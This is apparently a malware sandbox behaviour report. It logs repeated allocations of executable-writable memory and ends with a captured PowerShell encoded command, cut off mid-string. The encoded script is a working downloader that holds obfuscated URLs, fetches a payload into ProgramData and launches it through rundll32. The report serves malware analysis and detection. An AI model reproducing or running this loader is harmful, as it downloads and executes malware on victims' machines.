allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02703000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02704000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02737000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02722000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02735000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02705000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02706000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02723000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02724000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02725000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02726000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02727000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02728000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02729000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04afa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04afb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04afc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04afd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04afe000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04aff000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -encodedcommand "JABBAHUAcgBvAGMAaABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMgBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQAUQBBAE0AQQBBAD0AcwBmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCADMAQQBHAEUAQQBiAEEAQgBzAEEARwA4AEEAZAB3AEIAVwBBAEcAawBBAFkAUQBCAHUAQQBHAFEAQQBaAFEAQgB5AEEAQwA0AEEAYwBnAEIAbABBAEgAQQBBAFkAUQBCAHAAQQBIAEkAQQAiADsAJABEAGkAZwByAGUAcwBzAGkAbwBuAGEAcgB5AEEAbgBvAHAAbABhACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgB3AEIAeQBBAEcAVQBBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAdQBBAEgAUQBBAGIAdwBCAGsAQQBHAEUAQQBlAFEAQQA9AEoARABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFUAQQBiAGcAQgBqAEEASABJAEEAWgBRAEIAaABBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBkAFEAQgB5AEEARwBjAEEAWgBRAEIAeQBBAEgAawBBACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABwAHUAcABpAGwAbABhAGcAZQBHAGkAZwBhAG4AdABpAGMAaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABFAEEATwBBAEEAeQBBAEMANABBAE8AUQBBADEAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABNAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABJAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHkAQQBEAE0AQQBOAFEAQQB1AEEARABJAEEATgBRAEEAeQBBAEEAPQA9ACIAOwAkAE0AaQBjAHIAbwBjAGgAZQBtAGkAYwBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBqAEEARwBnAEEAWQBRAEIAeQBBAEcAYwBBAFoAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWQB3AEIAaABBAEgATQBBAGEAUQBCAHUAQQBHADgAQQB6AFIAUwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA1AEEAQwA0AEEATQBRAEEANQBBAEQASQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEEAPQA9ACIAOwAkAFQAcgBlAG0AZQBuAGQAbwB1AHMAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBoAEEARgBRAEEAYQBRAEIAdQBBAEcAWQBBAGQAUQBCAHMAQQBDADQAQQBZAGcAQgAxAEEARwBrAEEAYgBBAEIAawBBAEEAPQA9AHIAQwBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEAeQBBAEQAYwBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9ACIAOwAkAHgAZQBuAG8AYwByAHkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABVAEEATABnAEEAeABBAEQASQBBAE4AQQBBAHYAQQBIAEEAQQBUAGcAQgBZAEEARgBrAEEATAB3AEIAeQBBAEQARQBBAFYAQQBCAG0AQQBHAGMAQQBiAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE4AQQBBAHYAQQBIAEkAQQBRAFEAQgBCAEEARQA4AEEAZABRAEIAMgBBAEQAWQBBAEwAdwBBAHcAQQBHADgAQQBhAGcAQgA1AEEARwBZAEEAVgBnAEIAVABBAEEAPQA9AGIAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB2AEEARABJAEEAYQB3AEIAVgBBAEYAawBBAE0AUQBCAEcAQQBDADgAQQBaAFEAQgBJAEEASABjAEEAYQBRAEIAawBBAEcANABBAFEAdwBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcgBhAHMAaABlAHMAVAByAGEAbgBzAGwAdQBjAGUAbgBjAGkAZQBzACAAaQBuACAAJAB4AGUAbgBvAGMAcgB5AHMAdABpAGMAIAAtAHMAcABsAGkAdAAgACIAYgBSACIAKQAgAHsAJABmAGEAcgByAGkAcwBpAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAdwBBAGIAdwBCADIAQQBHAEUAQQBaAHcAQgBsAEEASABNAEEATABnAEIAbwBBAEcARQBBAGIAUQBCAGkAQQBIAFUAQQBjAGcAQgBuAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFMAbwBwAGgAaQBzAHQAaQBjAGEAbABsAHkAVQBuAGcAdQBhAHIAYQBuAHQAZQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEASABJAEEAWgBRAEIAegBBAEcARQBBAEwAZwBCADEAQQBIAE0AQQB4AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAFUAQQBNAHcAQQB1AEEARABZAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBADIAQQBBAD0APQAiADsAJABnAHIAYQB2AGUAZwBhAHIAdABoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBzAEEARwBVAEEAZABnAEIAbABBAEcAdwBBAGIAUQBCAGgAQQBHADQAQQBVAHcAQgB3AEEARwBFAEEAWgBBAEIAcABBAEgAZwBBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBsAEEARwA4AEEAeQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBPAEEAQQB1AEEARABJAEEATgBBAEEAegBBAEEAPQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBFAEEAWgBBAEIAaABBAEgAQQBBAGQAQQBCAHAAQQBIAFkAQQBaAFEAQgBzAEEASABrAEEAVgBnAEIAcABBAEcAOABBAGIAQQBCAGwAQQBHADQAQQBZAHcAQgBsAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBjAGcAQgAxAEEARwBZAEEAWgBnAEIAcwBBAEcAVQBBAFoAQQBCAEUAQQBHAG8AQQBaAFEAQgBpAEEARwBVAEEAYgBBAEIAegBBAEMANABBAGQAQQBCAHYAQQBIAGsAQQBjAHcAQQA9ACIAOwAkAHIAZQBtAGUAbQBiAHIAYQBuAGMAZQBBAGwAZQB4AGEAbgBkAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAGQAZwBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEATABnAEIAbABBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBaAFEAQQA9ACIAOwAkAG0AYQBuAGcAYQBuAG8AcABoAHkAbABsAGkAdABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQBzAGgAZQBzAFQAcgBhAG4AcwBsAHUAYwBlAG4AYwBpAGUAcwApACkAOwBpAHcAcgAgACQAbQBhAG4AZwBhAG4AbwBwAGgAeQBsAGwAaQB0AGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwA7ACQAYwBhAHIAYQBzAHMAbwB3AHMAUwB1AGIAZAB1AGUAZABuAGUAcwBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYgBRAEIAdgBBAEcAOABBAFkAdwBCAG8AQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYgBRAEIAbABBAEgATQBBAFkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBPAFEAQQB1AEEARABZAEEATwBBAEEAdQBBAEQARQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB5AEEARABRAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANgA2ADMAMwAzACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwB3AEEAYQBRAEIAMABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQgB6AEEARQAwAEEAYgB3AEIAdQBBAEcAYwBBAGIAdwBCAHYAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYwB3AEIAMQBBAEcASQBBAGQAQQBCAHkAQQBHADgAQQBZAHcAQgBvAEEARwBFAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHAAQQBHAE0AQQBMAEEAQgBVAEEARwBVAEEAYwB3AEIAMABBAEQAcwBBAFIAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEIAcQBBAEgATQBBACIAOwAkAGYAbwByAGUAZABlAHMAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE0AZwBBAHkAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQBFAHgAcAByAGUAcwBzAGoAcwA7AH0AIABjAGEAdABjAGgAIAB7ACQASAB5AGEAbAB1AHIAbwBuAGkAYwBPAGYAZgBsAG8AYQBkAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAGcAQgBtAEEARwB3AEEAYgB3AEIAMwBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBjAHcAQgBoAEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHcAQQBHAGsAQQBiAGcAQgBuAEEARwB3AEEAWgBRAEIAVABBAEcARQBBAGIAQQBCAHAAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAaABBAEMANABBAFoAZwBCADEAQQBIAFEAQQBZAGcAQgB2AEEARwB3AEEAcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBZAFEAQgB5AEEARwBrAEEAZABBAEIAaABBAEcAYwBBAFoAUQBBAHUAQQBHADAAQQBiAHcAQgB0AEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB1AEEARwBZAEEAWgBRAEIAegBBAEgATQBBAFoAUQBCAHkAQQBFAEkAQQBZAFEAQgB1AEEARwBzAEEAYwB3AEIAcABBAEcARQBBAGMAdwBBAHUAQQBHAEkAQQBZAFEAQgA1AEEARwBVAEEAYwBnAEIAdQBBAEEAPQA9ACIAOwAkAHIAZQBjAHUAZQBpAGwAbABlAG0AZQBuAHQAUAByAG8AcwBwAGUAYwB0AGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHkAQQBEAEEAQQBMAGcAQQAyAEEARABFAEEATABnAEEAeABBAEQAawBBAE4AQQBBAD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATwBRAEEAMQBBAEMANABBAE0AUQBBADIAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATwBRAEEAPQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAGkAQQBIAEkAQQBhAFEAQgB1AEEARwBFAEEAZABBAEIAbABBAEYAUQBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgBsAEEASABJAEEATABnAEIAagBBAEcAOABBACIAOwB9AH0AJABTAHUAYwBjAG8AdQByAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAGwAQQBIAE0AQQBhAFEAQgB6AEEARQBNAEEAYgB3AEIAdABBAEcAMABBAFoAUQBCAHUAQQBHAFEAQQBZAFEAQgBrAEEARwA4AEEAYwBnAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBBAEEANQBBAEMANABBAE8AQQBBADMAQQBDADQAQQBNAFEAQQB4AEEARABBAEEATABnAEEAeABBAEQAVQBBAE0AUQBBAD0AdwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB1AEEARwBVAEEAWQBRAEIAcwBBAEcAOABBAFoAdwBCAHAAQQBHAE0AQQBVAHcAQgBvAEEARwA4AEEAZAB3AEIAaQBBAEcAOABBAFkAUQBCADAAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AIgA7ACQAQgByAGEAaQBuAHcAYQBzAGgAZQByAHMAUAByAGUAYwBvAG4AZABlAG0AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBnAEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATABnAEEAeQBBAEQATQBBAE0AdwBBAD0ASQA9AG0AYQBBAEIAMABBAE